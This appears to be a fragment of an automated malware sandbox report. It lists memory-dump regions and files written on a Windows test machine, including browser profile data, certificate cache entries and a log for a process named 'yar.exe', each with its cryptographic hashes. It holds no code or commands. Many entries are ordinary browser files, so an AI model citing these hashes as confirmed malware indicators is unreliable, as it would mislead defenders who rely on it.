SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

memory/5108-954-0x000000001CD30000-0x000000001CDA6000-memory.dmp

memory/5040-958-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7DF.tmp.csv

MD5 7cfa6859d175bfbd0f39171939ee483d
SHA1 cddceea7249a8a3d6cd749f7bb2217742dae5482
SHA256 955cc2a84d1e9bc0ccc6e09dda465ac6521aede4b970c1bb364976db828f5a6f
SHA512 9c2f159390027c2a7673c92c568973e5d67b6bcf4d0cba448d18d97dc200b2cb8837c16caa06ed78efcd067aa860dcad7a2ac0066be7089d20e3a3e52f66fd3d

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC83E.tmp.txt

MD5 26e96215aa9b5a2a005871fdbfdb1324
SHA1 bf3701aad15d8950514b1caaa06639c53d87930f
SHA256 c1cd63d6ebfb5f58eb21157db8980433fe673bd090d791e530b6fead6ffb99e9
SHA512 b9d063ece3b0d210609f57d1f1e7be86faf09c15c332862891796b083d6328a8876d4c5bfd87c7d22aa6794997ae172755110d1adbabc55d135dedd53376a471

memory/5792-1061-0x0000000000B90000-0x0000000000BC8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 d9531ccb17e4d36b0055157a51bc3762
SHA1 b88b8a76e55398d418e6ce55bc924e36812400f3
SHA256 d7cdf4a3b94730e1e3149381e6e59f469e2140526e5dc73ee1635160f4b3c7df
SHA512 5d06bd8dd82ad6bff41412d9f458344eecb9cadcb76743c530705bc4968dd6a760a1eec427b6d4d1346bab591f11610db5757f49721df73a9195c29416314248

memory/5108-1102-0x000000001C570000-0x000000001C580000-memory.dmp

memory/5108-1104-0x000000001C620000-0x000000001C63E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yar.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/2088-1144-0x0000000000550000-0x0000000000560000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

MD5 dd5e716bab91e0829dfbf775c232946c
SHA1 acd4ae489f709e11392b62c8153333fde88a2873
SHA256 4dc1f486cfb4930e8c151b2ec1948c3da37170ffcb152599aae93a17428b1aca
SHA512 e0338d7a32d2a72fb42ac2eccc58d014177a0bcf939f45b9780064834f761ef91806c0ae7298ad849d140178f8c7bf5e30ffbac819e6b9a0b2bbcabaca63aa5b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\379b990b-3dbf-4355-9398-f611ca4d9dbb

MD5 0af6eeb6f9b0abd819589b34a56d6133
SHA1 eef79e6f8f2592f5c01a849c34e7a41020fd3367
SHA256 78a4b04176c04eeb34222c748cfa3d406ce5289a1eaa611f6db8cf86a1c0c2fe
SHA512 acd2ba44df314d3a50a21715bf7a835217d15ca1fd3ea91df4458f85e50f3d9b2f2f8ca9772cddb88b44ce90eed11480b8621af83770235b2b16fa53aacbd4bf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

MD5 89be356d888c71449da9a984cdec5aed
SHA1 c4087fa6f50782eb9d4b4698a17f6d05479dcea1
SHA256 0ccadc220da9907a5e52edb02a0fb729f979cccdec90122e9c431b33ebd45a86
SHA512 f07f8b3425a45742991dfb317f394340a08dc96dc4a7b5c5c757715fb35a5f96d90cb31a5d4588d0b5d3a8dff0168dd0d5927a2d80f4bcc8f4df747c28f50a29

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a21e188ec9656e81174724cc5e4bdbce
SHA1 c2775f0efe28c9ed08bc8a0a3030c07e98bd66a6
SHA256 a59f2ce2b7edc449711079f047c9b06917af89bf9b4a6c678c78111b417cba6d
SHA512 3db1fefae4edf14f23dfc2b18b231b80cdc6fe1e8e88766de75931a0ed005d40dee0d6eb6b8f230d3394b88ca52fda19c89bc9c2f495d7a57fcd43941777bd9a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

MD5 dd3b215776fe405e061249397d5ea22a
SHA1 ad683ea30bca6d98d9a686d65c866eeb723144f8
SHA256 1466cf8fb7e00388773e99781452c2f38cfe55b37150f1085a549977ff5eda0d
SHA512 7b451ee5b97326544c12a24bb887a2d1b802fbffacf1e0e6e800cb619b761da3ed46d64d64394f9f9e85717ce9f9ae59001f9b2f53ab4fa3a8b815890210be2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3230e22ce6a7f801a675fc2192ce7f4f
SHA1 2c38ddd2422bcfc2f8a7a015370f9a6066f40409
SHA256 dfcbf00413990164ce771a84af88d84e43ccd1a31ad181bb98a571e95b9177b4
SHA512 041c5dc70669b888c336c35134983cba228a743845f686b94d33a4f4ddeee4786717904baec98d7e77c720ec2e818e26a86c31f1bc6dfc46341750eb91f55ad8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1e041e35fc39005959c1b0734fc4f9b6
SHA1 de075c6d0fb71bd4a3e080d1a09066923b3c8e84
SHA256 90cd0cc829535dae58bf5150c0c09aff9de3957d8486162719c2fda5214e5e1d
SHA512 258b23e5950203129024c4080af930871794607b9e3a463f2c38887219048661126284e17273e41816463d419c8839f62baea5b47df2f8534f96741d1abed892

memory/5996-1320-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

MD5 0d70806336f0d94a3faee385465014b5
SHA1 583d1c75d36498a288fe12e72358d6c5dca51637
SHA256 7c93b9374dedffbed3bfe8140ada26635ee3b215fc17371b5a0c7078f51c9de8
SHA512 4f30d0160e74d296dcfeeb1bee606e9d062a1edf67285ba94efdfed6f7ebc2ea3c98f686a569fe71f26e0bd2dbdb4a6f1eefa6bef94d2bd375c7d17a392d4a97

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649

MD5 0e4e4e077a1d8450ef908d9c8512d8eb
SHA1 8dfd99d32aed25d8f4c7783bce4272e25311d530
SHA256 cf3507de92e808feb4ded40e792f23ea9a003e911c19c877a61d19fcfea35f35
SHA512 aad87629dfcacc06eb8d7ecf3eb89bba2591fdf653fa7f2617ecfa7d5d75a05b736b05a2db6c52fec418b23a6f09b719443751f47d3c38e0a74c65ca58cf04ab

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

MD5 6870bd74420e8b401365822281f80594
SHA1 47d99a4cac4e479c0ae79e8b17f4f1d6cbef67ab
SHA256 c305a29163e05fe4a5f919dedad94ab9408b8bc2815b6a9859ced4db7f1871a6
SHA512 247179bc0e227b913a070bb4b73414ef799d89dc9b377611ff9cb649daf6cdf5874341f6993345ac94fea08063aae160f9a3eafc645a9a612e03c96e1e4a295c

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 9b2e662ce25536075ab312ebed5902f4
SHA1 c8dfe5275b990aeda762b651085727d4e39aaefd
SHA256 6b3c58d3bb9db815a3652373a821b14326c49e2322b0924998b9c6ee3cf011d3
SHA512 3be341a88c9ff1719fc1865e5ecf3f95e7a279c84be3e1d1c552220f6bd84cf1d0529ebf9f1b15b2f851f0c87d2f8770c683018ee51f2ae3ed445b5d92c843c9

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 5d4df79d3cca04f799aac29362187583
SHA1 6312922a1bb17770b0036541b4d78e38ec972f29
SHA256 647c94d5b8ce3fb55bbca4149b6f4a6858178146ce3cbadae7d6799988597d1b
SHA512 3db4260cc39ff89368eb4814bfac62efa09b93858d938543a8a561f0b5750753748632f22829226bc5c96ebb711541458e72c2b1099de6ed8610f522adc595f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 1b70f9c88d6eb3dc6688661966bbfbe4
SHA1 1b6e5c2f100fce957df6d32272e292bdc472dcc0
SHA256 b0c6833ac9cf7f40cef2736b434e2627fe7f0b0b29bc6a3b9c8bb20514e19411
SHA512 39e032c60accec5c72a72ecd3e877ea1bf5f96450a57b54fc5fb1978c321f31382ce836bb1106bfef2232655ab8e8b90206f466538a87a457e86eeb0f60a2321

memory/372-3369-0x0000000000BC0000-0x0000000000BF8000-memory.dmp

memory/4156-3380-0x00000000009D0000-0x0000000000A06000-memory.dmp

memory/572-3393-0x00000000008E0000-0x00000000008F0000-memory.dmp